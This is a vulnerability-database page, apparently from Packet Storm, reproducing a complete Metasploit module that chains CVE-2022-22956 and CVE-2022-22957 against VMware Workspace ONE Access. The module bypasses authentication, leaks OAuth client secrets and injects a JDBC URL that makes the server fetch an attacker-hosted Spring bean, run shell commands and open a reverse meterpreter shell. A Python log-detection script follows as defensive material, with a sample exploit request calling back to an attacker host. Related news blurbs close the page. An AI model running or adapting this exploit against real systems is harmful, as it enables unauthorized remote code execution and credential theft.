
VMware Workspace ONE Remote Code Execution

This Metasploit module chains two vulnerabilities in order to achieve remote code execution in the context of the horizon user. The first vulnerability, CVE-2022-22956, is an authentication bypass in the OAuth2TokenResourceController ACS endpoint which allows a remote, unauthenticated attacker to bypass the authentication mechanism and execute any operation. The second vulnerability, CVE-2022-22957, is a JDBC injection remote code execution vulnerability in the dbCheck method of the DBConnectionCheckController class, which allows an attacker to deserialize arbitrary Java objects and thereby achieve remote code execution.

Packet Storm
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  class InvalidRequest < StandardError
  end

  class InvalidResponse < StandardError
  end

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain',
        'Description' => %q{
          This module combines two vulnerabilities in order to achieve remote code execution in the context of the
          `horizon` user. The first vulnerability CVE-2022-22956 is an authentication bypass in
          OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the
          authentication mechanism and execute any operation. The second vulnerability CVE-2022-22957 is a JDBC
          injection RCE specifically in the DBConnectionCheckController class's dbCheck method which allows an attacker
          to deserialize arbitrary Java objects which can allow remote code execution.
        },
        'Author' => [
          'mr_me', # Discovery & PoC
          'jheysel-r7' # Metasploit Module
        ],
        'References' => [
          ['CVE', '2022-22956'],
          ['CVE', '2022-22957'],
          ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],
          ['URL', 'https://github.com/sourceincite/hekate/'],
          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']
        ],
        'DisclosureDate' => '2022-04-06',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => %i[curl wget],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'Payload' => {
          'BadChars' => "\x22"
        },
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'LPORT' => 5555
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  # The VMware products affected do not expose any version information to unauthenticated users.
  # Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were
  # patched in the following VMware update: https://kb.vmware.com/s/article/88099
  def check
    @token = get_authentication_token
    Exploit::CheckCode::Vulnerable('Successfully by-passed authentication by exploiting CVE-2022-22956')
  rescue InvalidRequest, InvalidResponse => e
    return Exploit::CheckCode::Safe("There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")
  end

  # Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956).
  #
  # Return the authentication token
  def get_authentication_token
    oauth_client = ['Service__OAuth2Client', 'acs'].sample
    res_activation_token = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client),
      'method' => 'POST'
    })

    unless res_activation_token
      raise InvalidRequest, 'No response from the server when requesting an activation token'
    end

    unless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8'
      raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token"
    end

    activation_token = res_activation_token.get_json_document['activationToken']

    res_client_info = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'),
      'method' => 'POST',
      'Content-Type' => 'application/x-www-form-urlencoded',
      'data' => activation_token
    })

    unless res_client_info
      raise InvalidRequest, 'No response from client when sending the activation token and expecting client info in return'
    end

    unless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8'
      raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return"
    end

    json_client_info = res_client_info.get_json_document
    client_id = json_client_info['client_id']
    client_secret = json_client_info['client_secret']
    print_good("Leaked client_id: #{client_id}")
    print_good("Leaked client_secret: #{client_secret}")

    post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}"
    res_access_token = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'),
      'method' => 'POST',
      'Content-Type' => 'application/x-www-form-urlencoded',
      'data' => post_data
    })

    unless res_access_token
      raise InvalidRequest, 'No response from the server when requesting the access token'
    end

    unless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token']
      raise InvalidResponse, 'Invalid response from the server when requesting the access token'
    end

    res_access_token.get_json_document['access_token']
  end

  # Serve the files for the target machine to download.
  # If the request to the server ends in .xml the victim is requesting the spring bean generated by generate_payload_xml.
  # If the request doesn't end in .xml the victim is requesting the linux dropper payload.
  def on_request_uri(cli, request)
    vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'")
    if request.to_s.include?('.xml')
      vprint_status('Sending XML response: ')
      send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-stream' })
      vprint_status('Response sent')
    else
      vprint_status('Sending PAYLOAD: ')
      send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-stream' })
    end
  end

  # Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim
  #
  # Returns an XML document containing the payload.
  def generate_payload_xml(cmd)
    bean = ''
    builder = ::Builder::XmlMarkup.new(target: bean, indent: 2)
    builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') do
      builder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') do
        builder.constructor do
          builder.list do
            builder.value('/bin/sh')
            builder.value('-c')
            builder.value(cmd)
          end
        end
      end
    end
    # Builder cannot emit a hyphenated element name directly, so rewrite it afterwards.
    bean.gsub!('constructor', 'constructor-arg')
    vprint_status(bean)
    bean
  end

  # Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting.
  def trigger_jdbc_rce(jwt, sub_cmd)
    # jdbc_uri  = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#(unknown)"
    jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword"
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'),
      'method' => 'POST',
      'Content-Type' => 'application/x-www-form-urlencoded',
      'Connection' => 'keep-alive',
      'cookie' => "HZN=#{jwt}",
      'data' => jdbc_uri
    })

    fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless res
    fail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}'
  end

  def execute_command(cmd, opts = {})
    vprint_status("Executing the following command: #{cmd}")
    @payload_xml = generate_payload_xml(cmd)
    trigger_jdbc_rce(opts[:jwt], cmd)
  end

  # Instruct the user to exploit CVE-2022-22960
  def on_new_session(_client)
    print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell')
  end

  def exploit
    unless @token
      begin
        @token = get_authentication_token
      rescue InvalidRequest => e
        fail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")
      rescue InvalidResponse => e
        fail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")
      end
    end

    @payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml'
    start_service('Path' => "/#{@payload_name}")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded, { jwt: @token })
    when :linux_dropper
      execute_cmdstager({ jwt: @token })
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
  end
end
```
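The module above leaves a distinctive trail in the appliance's web access log: three unauthenticated POSTs (generateActivationToken, activate, oauthtoken) from one source followed by a POST to the dbCheck endpoint whose JDBC URL carries socketFactory parameters. The following Python script is an added detection example, not part of the Packet Storm listing or the Metasploit module. It assumes combined-format access log lines; the optional trailing body="..." field is a stand-in for a reverse proxy or WAF that records POST bodies, and the sample lines (including the 10.0.0.x sources and the 198.51.100.7 callback host) are constructed for illustration.

```python
"""Flag the VMSA-2022-0011 request chain (CVE-2022-22956 auth bypass followed by
CVE-2022-22957 dbCheck JDBC injection) in web access logs.  Added example, not
part of the Metasploit module; see the lead-in for the assumptions it makes."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Request paths taken from the module above.
ACTIVATION_TOKEN_PREFIX = "/SAAS/API/1.0/REST/oauth2/generateActivationToken/"
ACTIVATE_PATH = "/SAAS/API/1.0/REST/oauth2/activate"
OAUTH_TOKEN_PATH = "/SAAS/auth/oauthtoken"
DBCHECK_PATH = "/SAAS/API/1.0/REST/system/dbCheck"

# Assumption: combined-format access log lines; the optional trailing
# body="..." field stands in for a reverse proxy or WAF that records POST bodies.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: body="(?P<body>[^"]*)")?$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one full exploit chain from 10.0.0.5 (callback host
# 198.51.100.7 is a documentation address), a benign admin dbCheck from
# 10.0.0.20, and a lone activate call from 10.0.0.9 that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Aug/2022:10:00:01 +0000] "POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/acs HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Aug/2022:10:00:02 +0000] "POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1" 200 300',
    '10.0.0.5 - - [11/Aug/2022:10:00:03 +0000] "POST /SAAS/auth/oauthtoken HTTP/1.1" 200 400',
    '10.0.0.5 - - [11/Aug/2022:10:00:05 +0000] "POST /SAAS/API/1.0/REST/system/dbCheck HTTP/1.1" 406 83 '
    'body="jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3D'
    'org.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3D'
    'http%3A%2F%2F198.51.100.7%3A8080%2Fabcd.xml&dbUsername=&dbPassword"',
    '10.0.0.20 - - [11/Aug/2022:10:00:30 +0000] "POST /SAAS/API/1.0/REST/system/dbCheck HTTP/1.1" 200 60 '
    'body="jdbcUrl=jdbc%3Apostgresql%3A%2F%2Fdb.internal%3A5432%2Fsaas&dbUsername=saas&dbPassword=x"',
    '10.0.0.9 - - [11/Aug/2022:10:01:30 +0000] "POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1" 200 300',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def jdbc_injection_indicators(body):
    """Return the socketFactory* parameters carried by the jdbcUrl in a dbCheck POST body.

    A legitimate connection check has no reason to name a socket factory class, so
    any hit is a strong indicator of CVE-2022-22957 abuse."""
    if not body:
        return []
    jdbc_url = parse_qs(body).get("jdbcUrl", [""])[0]   # parse_qs percent-decodes the value
    if "?" not in jdbc_url:
        return []
    jdbc_params = parse_qs(jdbc_url.split("?", 1)[1])
    return sorted(k for k in jdbc_params if k.lower().startswith("socketfactory"))


def detect(lines, window=timedelta(minutes=10)):
    """Scan log lines in time order; return (ip, rule, timestamp) findings."""
    events = [r for r in (parse_line(line) for line in lines) if r]
    events.sort(key=lambda r: r["ts"])
    findings = []
    # Per-source progress through the three-step bypass, reset once the window lapses.
    stage = defaultdict(lambda: {"first": None, "seen": set()})
    bypassed = set()
    for r in events:
        ip, path = r["ip"], r["path"]
        st = stage[ip]
        if st["first"] and r["ts"] - st["first"] > window:
            st["first"], st["seen"] = None, set()
        step = None
        if path.startswith(ACTIVATION_TOKEN_PREFIX):
            step = "generate"
        elif path == ACTIVATE_PATH:
            step = "activate"
        elif path == OAUTH_TOKEN_PATH:
            step = "token"
        if step and r["method"] == "POST":
            st["first"] = st["first"] or r["ts"]
            st["seen"].add(step)
            if st["seen"] == {"generate", "activate", "token"} and ip not in bypassed:
                bypassed.add(ip)
                findings.append((ip, "cve-2022-22956-auth-bypass-chain", r["ts"]))
        if path == DBCHECK_PATH and r["method"] == "POST":
            if jdbc_injection_indicators(r["body"]):
                findings.append((ip, "cve-2022-22957-jdbc-socketfactory", r["ts"]))
            elif ip in bypassed:
                # Body not logged, but a dbCheck right after a bypass chain still merits a look.
                findings.append((ip, "dbcheck-after-auth-bypass", r["ts"]))
    return findings


if __name__ == "__main__":
    for ip, rule, ts in detect(SAMPLE_LOG):
        print(f"{ts.isoformat()} {ip} {rule}")
```

Two points of design: the bypass rule fires only when all three token-minting requests come from one source inside the window, so a single stray activate call (10.0.0.9 above) stays quiet, and the dbCheck rule degrades gracefully when bodies are not logged by falling back to the weaker "dbCheck after bypass" correlation. The sample chain ends with the 406 the module itself checks for, which is a reminder that the exploit succeeds even though the connection check reports failure.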

Related news

2022's most routinely exploited vulnerabilities—history repeats

What can the routinely exploited vulnerabilities of 2022 tell us, and what do we think will make it on to next year's list?

Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities

A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five

VMware Workspace ONE Access Privilege Escalation

This Metasploit module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their privileges to root access.

VMWare vulnerabilities are actively being exploited, CISA warns

CISA has issued severe warnings about disclosed vulnerabilities in VMWare products that are actively being exploited, probably by APT threat actors.

VMware Releases Patches for New Vulnerabilities Affecting Multiple Products

VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks. The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior

April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell

Researchers say a GitHub proof-of-concept exploitation of recently announced VMware bugs is being abused by hackers in the wild.

Critical VMware Bug Exploits Continue, as Botnet Operators Jump In

A critical VMware bug tracked as CVE-2022-22954 continues to draw cybercriminal moths to its remote code-execution flame, with recent attacks focused on botnets and Log4Shell.

CVE-2022-22954: VMSA-2022-0011

VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.
